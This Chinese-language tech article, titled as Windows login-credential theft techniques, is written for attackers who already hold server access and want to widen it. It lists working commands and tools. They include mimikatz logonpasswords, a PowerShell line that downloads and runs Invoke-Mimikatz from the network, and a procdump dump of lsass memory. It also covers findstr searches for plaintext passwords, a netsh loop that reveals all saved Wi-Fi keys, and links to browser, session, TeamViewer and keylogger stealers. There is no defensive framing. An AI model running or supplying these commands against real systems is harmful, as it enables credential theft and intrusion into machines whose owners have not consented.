Windows登录凭据窃取技巧

时间：2023-03-21 23:15:46 科技观察

获得Windows服务器权限，收集各种登录凭据，扩大战果。本文分享了几种用于窃取Windows登录凭据的工具和技术。1、Windows本地密码哈希Windows的系统密码哈希一般默认由两部分组成：第一部分是LM-hash，第二部分是NTLM-hash。ThehashpasswordformatunderWindowssystemisusername:RID:LM-HASHvalue:NT-HASHvalue.例如：Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040用户名称为：AdministratorRID为：500LM-HASH值为：AF01DF70036EBACFAAD3B435B51404EENT-HASH值为：44F077E27F6FEF69E7BD834C7242B040破解方式一：hash在线破解网站https://www.objectif-securite.ch/ophcrackhttp//cmd5.com破解方法二：mimikatzGithub地址：https://github.com/gentilkiwi/mimikatzmimikatz也很厉害使用简单，提取Windows系统明文密码只需要两行命令：privilege::debugsekurlsa::logonpasswordscracking方法三：wcewce常用参数说明如下：参数说明：-l列出登录会话和NTLM凭证（默认值）-s修改当前登录会话的NTLM凭证参数：<用户名>:<域名>::-w通过摘要认证缓存明文密码方法四：Powershell+mimikatz直接使用powershell调用mimikatz抓取系统中的明文密码。powershell"IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Invoke-Mimikatz-DumpCreds"破解方法五：prodump+mimikatzprocdump是微软官方提供的一个小工具。微软官方下载地址：https://technet.microsoft.com/en-us/sysinternals/dd996900#将工具复制到目标机器上，执行以下命令（需要管理员权限，我选择的版本是64位的）procdump.exe-accepteula-malsass.exelsass.dmp#将生成的内存转储文件复制到mimikatz同级目录下，双击打开mimikatz。执行情况如图：mimikatz#sekurlsa::minidumplsass.dmp#SwitchtoMINIDUMPmimikatz#sekurlsa::logonPasswordsfull2、抓取浏览器密码很多浏览器都提供了记住密码的功能，用户在登录时会选择记住密码一些网站。LaZagne：提取浏览器保存的密码github项目地址：https://github.com/AlessandroZ/LaZagne3，服务器在一些配置文件或日志中以明文形式存储密码，明文记录密码敏感信息，如web.config,config.ini等文件，可以手动搜索敏感目录，或者使用findstr命令查找敏感文件和内容。findstr/i/s"password"*.configfindstr/i/s"password"*.inifindstr/i/s"password"*.xml4、第三方运维工具托管密码解密常用linux运维工具，如Putty、xshell、winscp等，RDP管理工具，RemoteDesktopOrganizer，远程控制软件：Teamviewer等。xshell密码解密工具：https://github.com/dzxs/Xdecrypt提取WinSCP、PuTTY等保存的session信息：https://github.com/Arvanaghi/SessionGopher从内存中提取TeamViewer密码的工具：https://github.com/attackercan/teamviewer-dumper一键破解客户端asterisk密码——asterisk密码查看器。5.一键获取电脑wifi密码#查看电脑连接的所有wifinetshwlanshowprofiles#查看wifi信号是Aaron的密码netshwlanshowprofilesname="Aaron"key=clear#CMD一键获取所有连接的WIFI密码for/f"skip=9tokens=1,2delims=:"%iin('netshwlanshowprofiles')do@echo%j|findstr-i-vecho|netshwlanshowprofiles%jkey=clear6.Windowskeylogging工具可以记录用户的击键，捕捉用户的敏感信息。github和T00ls都可以找到这种源码和工具。7.Windows密码提取工具各种Windows程序的密码提取工具合集，包括各种浏览器、邮箱、Windows网络密码、无线网络密钥等。IE浏览器密码提取工具：https://www.nirsoft.net/toolsdownload/iepv.zipFirefox浏览器密码提取工具：https://www.nirsoft.net/toolsdownload/passwordfox-x64.zipChrome浏览器密码提取工具：https：//www.nirsoft.net/toolsdownload/chromepass.zipSVN密码解密器：http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip邮箱密码提取工具：https://www.nirsoft。net/toolsdownload/mailpv.zip提取保存在.rdp文件中的密码：https://www.nirsoft.net/toolsdownload/rdpv.zipMSSQL凭证密码获取工具：http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip

上一篇：让项目经理比程序员更痛苦的12个问题《

下一篇：推荐几款MySQL相关工具

Windows登录凭据窃取技巧相关文章